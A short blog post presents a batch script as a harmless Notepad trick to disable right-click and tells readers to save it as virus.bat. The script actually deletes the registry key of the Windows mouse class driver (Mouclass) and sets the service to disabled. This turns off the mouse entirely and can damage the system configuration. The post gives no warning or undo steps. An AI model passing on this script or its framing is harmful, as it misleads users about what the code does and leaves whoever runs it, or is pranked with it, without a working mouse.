Wednesday 30 October 2013

Trick to disable right click in mouse./Notepad tricks 2013


Sharing with you all a new trick on  Notepad where you can disable right click on mouse. just check out few simple steps shown below and try out...

1. Open your Notepad.

2. Copy and past below code in Notepad.

rem
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem 

3. Save this file as virus.bat save in your system Had Disc any where.

4. You have Done,Now open this folder and check out.

0 comments:

Post a Comment